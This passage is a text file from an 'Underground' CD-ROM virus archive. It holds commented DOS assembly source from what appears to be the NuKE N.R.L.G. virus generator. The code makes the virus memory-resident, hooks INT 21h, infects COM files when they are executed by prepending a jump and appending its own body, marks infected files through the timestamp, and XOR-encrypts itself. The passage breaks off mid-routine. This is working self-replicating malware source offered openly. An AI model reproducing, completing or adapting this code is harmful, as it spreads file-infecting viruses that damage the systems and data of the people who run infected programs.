Underground

home *** CD-ROM | disk | FTP | other *** search

/ Underground / Underground CD1.iso / virii / virgen / nrlg / 2.N2 < prev next >

Wrap

Text File | 1994-06-09 | 9.6 KB | 202 lines

;**************************************************************** ; PROCESS TO REMAIN RESIDENT ;**************************************************************** mov ax,3521h int 21h ;store the int 21 vectors mov word ptr [bp+int21],bx ;in cs:int21 mov word ptr [bp+int21+2],es ; ;--------------------------------------------------------------- push cs ; pop ax ;ax = my actual segment dec ax ;dec my segment for look my MCB mov es,ax ; mov bx,es:[3] ;read the #3 byte of my MCB =total used memory ;--------------------------------------------------------------- push cs ; pop es ; sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus sub bx,17 + offset fin ;and 100H for the PSP total mov ah,4ah ;used memory int 21h ;put the new value to MCB ;--------------------------------------------------------------- mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin mov ah,48h ; int 21h ;request the memory to fuck DOS! ;--------------------------------------------------------------- dec ax ;ax=new segment mov es,ax ;ax-1= new segment MCB mov byte ptr es:[1],8 ;put '8' in the segment ;-------------------------------------------------------------- inc ax ; mov es,ax ;es = new segment lea si,[bp + offset start] ;si = start of virus mov di,100h ;di = 100H (psp position) mov cx,offset fin - start ;cx = lag of virus push cs ; pop ds ;ds = cs cld ;mov the code rep movsb ;ds:si >> es:di ;-------------------------------------------------------------- mov dx,offset virus ;dx = new int21 handler mov ax,2521h ; push es ; pop ds ; int 21h ;set the vectors ;------------------------------------------------------------- pum2: ; ; mov ah,byte ptr [cs:bp + real] ;restore the 3 mov byte ptr cs:[100h],ah ;first bytes mov ax,word ptr [cs:bp + real + 1] ; mov word ptr cs:[101h],ax ; ;------------------------------------------------------------- mov ax,100h ; jmp ax ;jmp to execute ; ;***************************************************************** ;* HANDLER FOR THE INT 21H ;***************************************************************** ; VIRUS: ; ; cmp ah,4bh ;is a 4b function? je REPRODUCCION ;yes! jump to reproduce ! cmp ah,11h je dir cmp ah,12h je dir dirsal: cmp AX,0CACAH ;is ... a caca function? (resident chek) jne a3 ;no! jump to a3 mov bh,0cah ;yes! put ca in bh a3: ; JMP dword ptr CS:[INT21] ;jmp to original int 21h ret ; make db '[NuKE] N.R.L.G. AZRAEL' dir: jmp dir_s ;------------------------------------------------------------- REPRODUCCION: ; ; pushf ;put the register pusha ;in the stack push si ; push di ; push bp ; push es ; push ds ; ;------------------------------------------------------------- push cs ; pop ds ; mov ax,3524H ;get the dos error control int 21h ;interupt mov word ptr error,es ;and put in cs:error mov word ptr error+2,bx ; mov ax,2524H ;change the dos error control mov dx,offset all ;for my "trap mask" int 21h ; ;------------------------------------------------------------- pop ds ; pop es ;restore the registers pop bp ; pop di ; pop si ; popa ; popf ; ;------------------------------------------------------------- pushf ;put the registers pusha ; push si ;HEY! AZRAEL IS CRAZY? push di ;PUSH, POP, PUSH, POP push bp ;PLEEEEEAAAAAASEEEEEEEEE push es ;PURIFY THIS SHIT! push ds ; ;------------------------------------------------------------- mov ax,4300h ; int 21h ;get the file mov word ptr cs:[attrib],cx ;atributes ;------------------------------------------------------------- mov ax,4301h ;le saco los atributos al xor cx,cx ;file int 21h ; ;------------------------------------------------------------- mov ax,3d02h ;open the file int 21h ;for read/write mov bx,ax ;bx=handle ;------------------------------------------------------------- mov ax,5700h ; int 21h ;get the file date mov word ptr cs:[hora],cx ;put the hour mov word ptr cs:[dia],dx ;put the day and cx,word ptr cs:[fecha] ;calculate the seconds cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX) jne seguir ;yes! the file is infected! jmp cerrar ; ;------------------------------------------------------------ seguir: ; mov ax,4202h ;move the pointer to end call movedor ;of the file ;------------------------------------------------------------ push cs ; pop ds ; sub ax,3 ;calculate the mov word ptr [cs:largo],ax ;jmp long ;------------------------------------------------------------- mov ax,04200h ;move the pointer to call movedor ;start of file ;---------------------------------------------------------- push cs ; pop ds ;read the 3 first bytes mov ah,3fh ; mov cx,3 ; lea dx,[cs:real] ;put the bytes in cs:[real] int 21h ; ;---------------------------------------------------------- cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ? jne er1 ;yes! is a EXE... fuckkk! ;---------------------------------------------------------- jmp cerrar er1: ;---------------------------------------------------------- mov ax,4200h ;move the pointer call movedor ;to start fo file ;---------------------------------------------------------- push cs ; pop ds ; mov ah,40h ; mov cx,1 ;write the JMP lea dx,[cs:jump] ;instruccion in the int 21h ;fist byte of the file ;---------------------------------------------------------- mov ah,40h ;write the value of jmp mov cx,2 ;in the file lea dx,[cs:largo] ; int 21h ; ;---------------------------------------------------------- mov ax,04202h ;move the pointer to call movedor ;end of file ;---------------------------------------------------------- push cs ; pop ds ;move the code push cs ;of my virus pop es ;to cs:end+50 cld ;for encrypt mov si,100h ; mov di,offset fin + 50 ; mov cx,offset fin - 100h ; rep movsb ; ;---------------------------------------------------------- mov cx,offset fin mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus enc: ; xor byte ptr cs:[di],1 ;encrypt the virus inc di ;code loop enc ; ;--------------------------------------------------------- mov cx,offset fin mov di,offset fin + 50 + (offset crypt - offset start) ;virus mov dx,1 enc2: ;